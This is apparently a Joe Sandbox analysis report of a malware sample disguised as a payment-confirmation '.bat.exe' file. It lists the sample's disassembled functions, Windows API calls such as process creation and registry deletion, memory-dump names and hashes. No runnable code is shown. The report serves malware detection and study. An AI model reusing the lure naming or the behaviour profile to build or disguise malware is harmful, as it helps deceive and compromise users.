Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45

Function 004070A9 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45

Function 0040347E Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403492

Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
SetFilePointer.KERNELBASE(0010A7C7,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D

Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00670348), ref: 00401C10
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22

Strings

Call, xrefs: 00401BC7, 00401BCD, 00401BE7

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D

Function 00403376 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C

Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
RegCloseKey.ADVAPI32(00000000), ref: 00402464

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D

Function 00405BD6 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
GetLastError.KERNEL32 ref: 00405C26

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9

Function 00405C65 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C

Function 00406A76 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79

Function 00406172 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00406176
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15

Function 00405C30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D

Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D

Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE

Memory Dump Source

